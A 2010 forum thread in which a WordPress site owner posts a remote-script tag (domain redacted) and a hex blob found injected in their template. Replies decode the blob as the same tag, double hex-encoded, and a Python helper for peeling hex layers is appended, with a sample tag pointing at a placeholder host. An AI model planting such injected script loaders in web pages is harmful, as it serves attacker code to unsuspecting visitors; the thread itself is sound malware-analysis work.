
decipher a chunk of malware

     

httpwebwitch

2:26 pm on Jul 6, 2010 (gmt 0)




Here's a challenge for someone who likes puzzles.

I just found this little chunk of crap injected into my WordPress template.

<script language="javascript" src="http://get.----[domain removed]----.com/inurl.js"></script>304430413343373336333732363937303734323036433631364536373735363136373635334432323641363137363631373336333732363937303734323232303733373236333344323236383734373437303341324632463637363537343245373336353734363836353646324536333646364432463639364537353732364332453641373332323345334332463733363337323639373037343345


Do the numbers mean anything?

SteveWh

4:54 pm on Jul 6, 2010 (gmt 0)




An initial guess would be that each 2 digit pair is the hex code for an ASCII char. By that method, the first 8 digits decode to 0D0A, which is a carriage return + line feed.

Another guess is that the string is decoded or transformed by the inurl.js file fetched from the remote site.

mattur

5:12 pm on Jul 6, 2010 (gmt 0)




It's double hex encoded, and appears to decode to the <script> statement you quote above:

<script language="javascript" src="http://get.----[mattur removed]----.com/inurl.js"></script>

Malfunctioning malware?! :)
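
The layered decoding discussed in the replies above, as an added example that is not part of the original thread: a small Python helper that peels hex layers off a suspicious string until the result stops looking like hex. The function names, the layer limit and the sample blob (built around a placeholder host) are assumptions made for illustration.

```python
import binascii
import string

HEX_DIGITS = set(string.hexdigits)
MAX_LAYERS = 8  # assumption: give up after this many nested layers


def peel_hex_layers(blob: str, max_layers: int = MAX_LAYERS):
    """Repeatedly hex-decode `blob` while it still looks like hex text.

    Returns (layers_removed, decoded_text). Peeling stops when the current
    text has an odd length or contains a non-hex character. If a layer
    decodes to non-ASCII bytes, their repr() is returned instead of text.
    """
    current = blob.strip()
    layers = 0
    while layers < max_layers and current:
        if len(current) % 2 or not set(current) <= HEX_DIGITS:
            break
        raw = binascii.unhexlify(current)
        layers += 1
        try:
            current = raw.decode("ascii")
        except UnicodeDecodeError:
            return layers, repr(raw)  # binary payload, cannot be another hex layer
    return layers, current


def hex_encode(text: str, times: int) -> str:
    """Build constructed input: hex-encode `text` `times` times (uppercase)."""
    for _ in range(times):
        text = text.encode("ascii").hex().upper()
    return text


# Constructed sample, not the blob from the thread: CRLF plus a script tag
# pointing at a placeholder host, hex-encoded twice.
SAMPLE_PLAIN = '\r\n<script src="http://malware.example.invalid/x.js"></script>'
SAMPLE_BLOB = hex_encode(SAMPLE_PLAIN, 2)

if __name__ == "__main__":
    # The first 8 digits of the posted blob, one layer only: gives "0D0A".
    print(peel_hex_layers("30443041", max_layers=1))
    layers, text = peel_hex_layers(SAMPLE_BLOB)
    print(f"layers removed: {layers}")
    print(repr(text))  # repr() keeps the decoded markup inert on the terminal
```

Printing the result with `repr()` and never writing it into an HTML page keeps the decoded script tag from being rendered while you inspect it.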
 
